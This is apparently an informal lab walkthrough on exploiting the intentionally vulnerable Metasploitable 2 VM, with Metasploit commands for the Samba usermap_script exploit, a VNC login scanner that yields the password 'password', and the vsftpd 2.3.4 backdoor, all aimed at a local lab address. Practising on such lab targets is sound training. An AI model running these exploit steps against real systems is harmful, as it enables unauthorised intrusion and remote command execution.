Metasploitable 2 Exploitability

install metasploitable on Virtuabox and start

and looks like tihis

Scan using nmap, zenmap and nessus

1. Samba

Let’s search for a Samba exploit and try it against the system:

msf  auxiliary(tikidblib) > use exploit/multi/samba/usermap_script
msf  exploit(usermap_script) > show options
msf  exploit(usermap_script) > set RHOST 192.168.56.101

msf  exploit(usermap_script) > exploit

type id and  press enter


2. VNC
sear for a vnc exploit;

use auxilary/scanner/vnc/vnc_login and then show option and set RHOST

next Exploit,

oke,, look at screenshot,, we get "password" VNC
open new terminal, type #vncviewer and enter

any pop up input target, type : 192.168.56.101

press enter, and then will pop up new input window, type password Vnc "password"

 oke,, pop up new window

we can handle metasploitable 2..


3. FTP

searc ftp

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf  exploit(vsftpd_234_backdoor) > set RHOST 192.168.56.101
msf  exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact

exploit, we can handle metasplitable